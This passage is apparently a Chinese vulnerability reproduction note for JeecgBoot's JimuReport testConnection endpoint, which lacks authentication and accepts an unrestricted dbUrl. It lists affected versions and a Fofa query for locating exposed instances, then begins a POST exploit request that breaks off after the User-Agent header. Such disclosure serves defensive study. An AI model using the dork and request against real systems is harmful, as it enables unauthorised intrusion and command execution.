简介
JeecgBoot 是一款基于代码生成器的低代码开发平台,零代码开发!采用前后端分离架构:SpringBoot2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。
积木报表积木报表是其中的低代码报表组件。是一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等。
漏洞描述
jeecg-boot/jmreport/testConnection Api接口未进行身份验证,并且未对 dbUrl 参数进行限制,导致攻击者可以向指定地址发起JDBC请求。
影响版本
JeecgBoot@[3.0, 3.5.3]
Fofa查询语句:
title="JeecgBoot 企业级低代码平台"
漏洞复现
向存在漏洞的目标地址向靶场发送POST数据包,执行命令:
echo "deti"
构造POST数据包:
POST /jmreport/testConnection HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac